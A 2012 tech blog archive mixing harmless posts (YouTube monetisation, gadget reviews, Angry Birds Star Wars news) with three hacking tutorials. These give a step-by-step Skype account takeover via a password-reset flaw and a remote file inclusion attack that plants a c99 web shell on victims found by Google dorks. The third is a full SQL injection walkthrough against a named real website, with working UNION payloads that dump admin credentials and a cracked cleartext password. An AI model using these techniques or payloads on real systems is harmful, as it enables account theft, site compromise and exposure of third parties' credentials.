Saturday, November 24, 2012

How To Make Money on YouTube



However, the process of becoming a YouTube partner is not as trivial as becoming an AdSense publisher. Below you’ll find the basic steps you need to go through:

1. Make Sure You Have an AdSense Account

      While the process to be able to display ads on your YouTube videos is a separate one, your earnings and stats will go together with your AdSense account, so you need to have one.
     In theory you could apply to become a YouTube partner before having an AdSense account, and in case you get accepted you would then follow up with an AdSense application. I believe the other way around is much simpler, though.


2. Grow Your Audience on YouTube

       One of the most important criteria the YouTube guys will use to evaluate your application is the audience you reach on YouTube. They don’t reveal what are the requirements, but I’ve seen many people say these are the ballpark numbers you need to have before getting accepted:
  • at least 1,000 subscribers
  • at least 1,000 views on all your videos
  • at least 10,000 channel views
      These are the very minimum though, if you want to make sure you’ll get accepted I would aim for 5,000 subscribers, 50,000 channel views and over 1,000,000 upload views total.

3. Get Videos Out There Regularly

      If you only have one or two videos uploaded your chances of getting accepted are low, even if those videos went viral. That’s because YouTube is looking for people who are planning to work with them over the long term.
    The more regularly and frequently you upload new videos, the better. For instance, someone who uploads a new video every day will have a better chance of getting accepted than someone who uploads one every couple of weeks.
     You also want to make sure you have at least 100 uploaded videos before applying to become a partner (though some people say 50 will be enough).

4. Develop A Brand Around Your Videos

    This step is not essential, but I think it helps a lot on getting approve. You need to remember that, once you meet the technical guidelines, it will be a person on the other site deciding on whether you are a good fit for becoming a YouTube Partner or not. In other words, the more professional you look the higher your chances.
Practical tips include:
  • Create a website to host your videos and give your audience more wayts to interact
  • Create a nice logo and use it everywhere
  • Use a watermark on your videos with your logo
  • Consider getting a professional intro made for your videos
  • Customize your YouTube channel to make it look professional

5. Make Sure Your Content Has Zero Copyrighted Material

       If there’s one thing that will get your application rejected on the spot is copyright infringement, so make sure you have zero copyrighted material on your videos.
       This includes images, graphics, logos, video clips and audio. For instance, even just using a music on the background which you don’t have permission to could get your application rejected.

6. Apply to Become a YouTube Partner

     After you followed all the previous steps you are ready to apply. You can do that via the official YouTube Partner Program page. It might take a while to get your application considered due to the load of people applying, but once you get accepted you’ll be able to start displaying ads on your videos right away.





Sunday, November 18, 2012

Nearly 8% Android app are “vulnerable” to attacks


German researchers: Nearly 8% Android app are “vulnerable” to attacks

























   

         According to the findings of a new computer security research carried out by 
German researchers, nearly 8 percent of Android apps are "vulnerable" to attacks because of weak SSL implementations; and are apparently leaking the users' personal details, including their bank account information and webcam access.

        Going by the study's results shared by researchers at the Leibniz University of Hannover and the Philipps University of Marburg, tests of 13,500 free and popular Android apps - available form the Google Play Store - showed that the coding used by as many as 1074 apps, or 8 percent apps, was either incorrect or inadequate; thereby increasing their vulnerability to attacks.
      The researchers elaborated that the 8 percent "vulnerable" Android apps chiefly contained SSL/TLS code which can potentially increased their risk of threat from what is called a Man-in-the-Middle (MITM) attack.
      Highlighting the findings of their research in a paper titled "Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security," the researchers said that since SSL/TLS are cryptographic protocols used for securing online communications, the implementation mechanism of these protocols as well as their dependence on a trusted third-party Certificate Authority make many apps susceptible to attacks.
       Affirming the findings of the German researchers, security firm Sophos' Paul Ducklin said that a badly written app seemingly has a rather low "barrier of entry"; and added: "You can occasionally stumble across stuff which really shouldn't be in the Play Store."

Hack any skype account in 6 easy steps


Vulnerability of Skype's password reset system.
The only thing you need to obtain full access to any Skype account is primary email of that account (the email which used when the Skype account been registered).
Following guide contains both - how to steal an account, and how to protect your account (scroll down for that). 

For example, I know somebody's email - crackme33@yahoo.com , let's hack his Skype!

1. Go to the Skype website, register new disposable account. In email field, put target's email.
If the email, you typed into form, attached to some skype account, then it will say that "You already have a Skype account", that means you can hack it!
So, complete the form, provide some fake BOD, gender, country, answer to question "How do you intend to use Skype?" as personal, fill any skype name (REMEMBER IT), it will give you some suggestions of not taken ones, assign some password  (REMEMBER IT), solve the captcha, proceed forward - push the continue button. 
You will be redirected to you new account dashboard. Logout from it.

  

2. Run the Skype application with those new credentials.

3. Since we just logged in to a fresh account, at home screen of the Skype application, there will be advertisement "Find your friends and say hello", click somewhere to bring focus on that part of screen (I clicked where the red cross is drawn):

Then push F5 button on your keyboard, it will refresh the home screen. Do that 3-4 times until you see "Bring your Facebook friends into Skype" advertisement. Click "No thanks, blah-blah-blah".


You will get the home screen with some banner. 


4. Go to Skype's password reset system.Put the target's email. In my case - crackme33@yahoo.com .

Click "Submit button", and after several seconds, you will see Skype's pop-up notification - "Password token".



5. Go to Skype application, on the home screen you will see Password token, click on "more info", go to "temporary code link":

6. Browser will open page, where you can select any skype account registered to target email, in my case there are two account - my disposable and target:


Choose target's account and click "Change password and sign me in":

 You will be redirected to login form:

You are all set!
P.S. I have changed primary email for that test accounts, so do not try hack them. Just in case. =)

How to protect your accounts

You already changed password for the target account, know the skype login, and able to use that target skype account. But somebody could take it back from you, just as you did (owner for example).
To prevent that you need to change your primary email to some address, unknown to anyone.

To do that:
1. Sign in on skype website.
2. Go into the "profile" link (click to enlarge):

3. On account information, go down, to "Contact details", click "Add email address":



4. Add your email address, which unknown to anybody, but you:



Click save button at the bottom of the form. After page reload, refresh page again to prevent some strange glitches of the site (if you will not reload the page, after you do following steps, it will forget steps 4 and 5 and discard that little work).

5. Scroll to Contact details again. Click on "Add email address" again. Switch primary email to the new one:


Click "Save" button at the bottom of the form, again.
It will ask you for your password. You know it already. Type password and click button by mouse, not by "Enter" key.
After page reload, refresh page again to prevent some strange glitches of the site (described above).

6. Scroll to Contact details again. Click on "Add email address" again. Delete (with backspace and/or delete buttons) all emails but primary:


7. Click "Save" button at the bottom of the form. Make sure all your changes applied (it sometimes require two or more attempts, since the site is developed by curly-handed programmers).
8. Tell to friends how to protect a skype account. ASAP

At the time there is no other way to protect your skype account, except changing of primary email to some unknown address.
Once account is stolen, it has ability to retrieve all your IM history from other peers.
If you already lost your account, contact to all your necessary contacts and tell them to remove you from their contact list. It prevents IM history interchange (if it is not already happened).

There is how mailbox of target looks like:



Thus target will receive notifications regarding password change, but initial owner have less than one minute to understand and take action, it is almost impossible to login into skype website, change emails, when a hacker already there. 

Thursday, November 8, 2012

Rovio releases Angry Birds Star Wars



Rovio releases Angry Birds Star Wars

Nov 08, 2012
Angry Birds Star Wars is now available on iOS, Android, Amazon Kindle Fire, Mac, PC, Windows Phone, and Windows 8.
A
ngry Birds Star Wars, the new game from Rovio Entertainment and Lucasfilm, is now available on iOS, Android, Amazon Kindle Fire, Mac, PC, Windows Phone, and Windows 8. Along with the game, the company has also released a new trailer for the game and merchandise in select retailers worldwide.

“It’s a banner day for us,” said Peter Vesterbacka, CMO of Rovio Entertainment. “This is our best Angry Birds game yet, and we’re excited for our fans to finally meet Luke, Leia, and the rest of the gang! But it’s more than just a game launch: we think fans are going to just love the new animated trailer and the Angry Birds Star Wars products, sure to be a big hit this holiday season.”




The game follows a plucky group of Rebel Birds in their fight against the evil Imperial Pigs. Fans will use the Force, wield a lightsaber, and blast away Pigtroopers on an intergalactic journey from the deserts of Tatooine to the depths of the Pig Star -- where they’ll face off against the terrifying Darth Vader, Dark Lord of the Pigs.

“We can’t wait for fans around the world to experience the fun of launching the Angry Birds characters into the Star Wars universe,” said Colum Slevin, Vice President, Head of Studio Operations for Lucasfilm Ltd. “This is the kind of creative partnership that has helped Star Wars remain vibrant and beloved for over 35 years.”

Rovio claims that with more than 80 levels in locations such as Tatooine and the Pig Star, the game features hours of gameplay, all new gameplay mechanics, the ability to level up birds, free updates, plus lots of secrets and hidden features. Fans can also train in the 'Path of the Jedi' in-app purchase to become a Jedi Master.



Concurrently with the game launch, Rovio and Lucasfilm have also introduced tie-in merchandise and a new cinematic trailer, which retells the classic Star Wars cantina scene with Angry Birds Star Wars characters in the starring roles. Angry Birds Star Wars merchandise, ranging from Hasbro toys to apparel to plush toys, is available now from select retailers.

Rovio Entertainment released a new and extended gameplay trailer for Angry Birds Star Wars on iOS, Android, Windows 8, PC, and Mac yesterday. In this trailer, we can see a variety of Angry Birds in their new Star Wars avatar flaunting their skills with lightsabers. The Bad Piggies, as expected, are from the Dark Side, and they too wield lightsabers. 


The game aims to combine all the fun of the classic Angry Birds and Angry Birds Space with the characters, stories, and settings of the epic space fantasy Star Wars.

Tooling Around With Windows 8

Tooling Around With Windows 8




Windows 8 has been designed for touch. You need a new, multitouch-compatible computer to take advantage of this, but you can get a feel for the experience on a mouse-based computer. For example, place your cursor over a tile, then hold the left mouse button down and track the pointer so it drags the tile to a new location on the Start screen. Release the left mouse button, and the tile will be relocated.

Monday, October 29, 2012

Shortest URL shortening service




URL shortening services allow people to remember the addresses (URLs) of websites having long characters easily and make producing them in text through memory enjoyable. The URL shortening service dates back to 2002 and till sate there had been some thousand websites launched to provide people the advantages of a URL shortener.


While twitter automatically shortens the long URLs to allow space for more relevant words to be inserted in the posts, the URL shortening services have had many downfalls in its 12 years career. Every shortened URL has an alphanumeric code that is unique for the site and directs one there. For example the URL ‘http://www.free-online-tv-shows.com’ ingg.gg generated the link ‘http://gg.gg/39r’ that is unique. However, this does not mean that ‘http://gg.gg/39r’ will lead to the above website.


All shortened URLs must be registered before they can actually be used to direct users to certain web-pages. There are certain forums that block the posting of shortened URLs, while some short URLs may fall under the category of spammers because there are people who abuse these services for spamming. Reports have is that 64 % of the URL shortening services that have been introduced have shut down. Short URLs have also been used to conduct malicious works like child pornography that have lead to their closure. Some short URLs might lie unused, or the service provider might not be able to deliver long term services, which results in ‘linkrot’ or in other words the link and the chain of its associated links break away.


The services of gg.gg are yet to be tapped to the fullest potential with their url shortener chrome plugin.

Saturday, October 27, 2012

Lenovo IdeaPad Yoga 13 hands on: Flexible laptop for flexible Windows 8











Lenovo caught the attention of a lot of folks with the introduction of the Yoga laptop for Windows 8. The Yoga is a full laptop that has a screen you can flip all the way behind the base, turning it into a touch tablet. The Yoga 13 runs full Windows 8 and not the tablet-oriented Windows RT.


See related: Windows 8 hardware: x86 tablets and hybrids


Using the Yoga is hard to describe, as it can function as a standard Windows laptop with a large touch screen. It couples a great keyboard and trackpad with the Windows 8 touch screen elements to yield a unique user experience.






I spent the first few hours with the Yoga strictly in laptop mode. I wanted to get a feel for how well it worked as a laptop, as I suspect most buyers will end up using it this way. As a laptop the Yoga is a typical Lenovo offering, good build quality and excellent hardware components.


Hardware specifications as reviewed:
Processor: Intel Core i5 1.7 GHz
Memory: 4 GB
Display: 13-inch IPS, 1600 x 900, 10-point multitouch
OS: Windows 8
Storage: 128 GB SSD
Camera: 1 MP webcam
Ports: 1-USB 3.0, 1-USB 2.0, audio combo, HDMI, 1-in-1 SD/MMC card reader
Connectivity: Wi-Fi b/g/n, Bluetooth
Battery: 8 hours
Dimensions: 333.4 x 224.8 x 16.9 mm (13.1 x 8.9 x 0.67")
Weight: 1.5 kg (3.3 lb)


Yoga 13 as a laptop


The Yoga 13 is an outstanding Ultrabook with the attention to detail Lenovo is famous for. The keyboard and large buttonless trackpad are quite good and coupled with the bright, vivid screen turn the Yoga into a great laptop.


The build quality of the device is quite good. It feels very solid yet very light. The special hinge on the display is very durable and allows flipping the lid all the way behind the keyboard base for use as a tablet. The keyboard is turned off when used as a tablet, a good thing as you actually push keys when holding the tablet.


Lenovo is quoting 8 hours of battery life and this feels accurate based on my limited use. The power cord has the special Lenovo connector used on recent laptops, roughly the size of a USB connector.


I am having some trouble with the trackpad, that otherwise is very sensitive and works mostly as expected. It took some deep digging to find the two-finger scrolling option for the trackpad, but once I enabled it I was a happy camper. I do find that in Windows 8 the individual apps must support such scrolling.


The trackpad is also prone to accidental activation when my hands are typing. There isn't an easy way to turn the trackpad off when typing which would make things much easier.


Yoga as tablet






To take advantage of the dual nature of Windows 8, the Yoga 13 can be turned into a full tablet. The screen is flipped all the way back behind the keyboard which deactivates the keyboard. It is disconcerting to constantly mash the keys when gripping the Yoga as a tablet, and I can't help feeling it will eventually break the keys.


As a tablet the Yoga 13 is not quite as good as it is a laptop. This is due to the sheer size of the device, which is too heavy for use in the hands for very long. It is a good touch tablet, just really big with that 13-inch screen.


The resolution of 1600 x 900 makes it really narrow in portrait mode, so I end up using it mostly in landscape. This makes it a pretty unwieldy tablet.


I also find that the edge swipe gestures used to invoke the Windows 8 charms, activate app settings, and switch among running apps are hard to perform. They rarely work with the first swipe, requiring a second attempt to execute the desired action. It is also common to accidentally execute an action on whatever tile is near the edge of the screen when trying to do a swipe gesture. This results in lots of apps running I don't want.


Yoga as hybrid






The ability to flip the display all the way behind the base adds the benefit of also moving the display anywhere in between closed and full tablet mode. This hybrid mode is touted by Lenovo as allowing propping up the unit like a tent for watching video or using in presentation mode. The Yoga 13 works well in either mode, although it's not likely to be used often in such modes.


The schizophrenic nature of the Yoga 13 goes hand in hand with the schizo nature of Windows 8. As a full version of Windows 8, legacy apps can be installed and run as desired. This is a powerful augmentation of the standard Metro desktop.


I find the new style Metro apps to be quite good, and the Yoga 13 runs them well on the large display. It is possible to also snap two apps side-by-side in Windows 8, a feature the wide display of the Yoga performs to advantage. I try to keep in Metro mode all the time, but Windows 8 makes this hard to do.


You never know when you tap a tile in Windows 8 if it is going to run in the preferred Metro mode or if you're going to get kicked into the desktop mode. It is jarring when that happens, as the windowed environment on such a high-resolution screen results in constant windows adjustment and font size increasing. Everything on the desktop is just so darn small on this great screen. It's like going from a modern operating environment (Metro) to an old-school Windows 7 desktop randomly.


Conclusion


The Yoga 13 is available now from Lenovo starting at $999. It is a great laptop with a unique bending screen that can be used in a number of positions for different functions. It's a large touch tablet that can be used much the same as any tablet, yet one that runs all Windows apps.


This laptop is primarily for those who need a laptop most of the time, with light duty as a tablet. The touchscreen works well in the laptop mode due to the Metro interface in Windows 8.

New Apple Mac Mini desktop computer is easy to repair, upgrade, says iFixit














Apple haters love to point to iFixit's teardowns of its recent products as a sign of the company's consumer unfriendliness. For instance, the site just failed the new MacBook Pro 13-inch with Retina Display on its repairability, scoring it a mere 2 out of 10. Conspiracy theories abound that Apple makes it difficult to repair and upgrade its products in order to make consumers buy new models instead of trying to fix their existing ones.


They'll have to hold their tongues about the new Mac Mini, however. According to iFixit's teardown of the tiny computer, Apple has actually made a device that is surprisingly easy to repair and upgrade. In fact, it gives the Mac Mini circa 2012 an 8 out of 10 on its repairability scale.


How did that happen? For starters, Apple makes it simple to open up the Mac Mini: just twist off the disc-shaped back panel to access its components. It also makes it easy to upgrade the system's RAM, as it uses PC3-12800 DDR3 RAM; in comparison, the new MacBook Pro has its RAM soldered to the logic board, meaning there's no option to replace or upgrade.


iFixit also gives Apple props for an easily repairable power supply, and it was successful in installing its own $69.95 Mac Mini Dual Hard Drive Kit without hiccups. The new Mac Mini lacks some of the other bugaboos that have made other recent Apple products difficult to upgrade and repair, like proprietary screws and numerous parts that are glued together.


Not everything is perfect, however. One part that is soldered on is the CPU, so you can't really replace it with a new processor in the future. And even if it's not hard to replace the power supply, you have to excavate it from a mountain of parts first. Still, I have a feeling the Mac Mini will easily top the score for the new iMac, whenever iFixit gets around to tearing that down.

Thursday, October 18, 2012

Remote File Inclusion (RFI) | Website Hacking


Before starting this tutorial, I would like to tell you about a piece of code called as  shell. There are many shells available . Lets consider a shell known as c99 shell. First download it from here.
Now signup for a account on any free web hosting site . Say 110mb.com.  Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of  shell you uploaded.

http://username.110mb.com/shell.php
and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.

Both images are showing the filemanager, In Ist I am accesing by signing into my account and 2nd just by accessing shell without logging into.
                                 




I just wanted to show you that Imagine if anybody somehow upload  this kind of shell on your server, how deadly it can be. Here comes the concept of Remote File Inclusion into picture.




Note:Your account might be suspended after uploading such shells.


What is Remote File Inclusion ?

As clear from the name, Remote File inclusion means 'including a remote file' . RFI is a vulneribility found in websites that allow attackers to include a remote file on the webserver. This may lead to remote code execution and complete compromise of system.

How to perform attack ?

Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.
Step 2. Search for the vulnerable site using google dorks. like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step3.  Lets say you  got any site like
http://www.victim.com/index.php?page=anything

Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?

Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.

SQL Injection


What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format 
www.anything.com/something.php?something=something, example 
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.



  


We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

 What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases. 

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.





SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number, 
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.



Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from  
 information_schema.tables where table_schema=database()--
 Click here
We got first table name on the screen.

To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from 
information_schema.columns where table_schema=database()-- 
Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns. 


Step 6.Fetching data from columns. 
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say 
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).


Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.